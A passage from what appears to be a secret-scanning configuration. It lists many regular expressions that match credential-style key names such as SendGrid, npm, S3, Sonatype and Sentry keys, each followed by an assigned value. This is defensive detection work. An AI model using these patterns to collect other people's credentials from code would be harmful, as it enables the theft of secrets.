+ ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sshpass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setsecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?repotoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?passwordtravis[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + 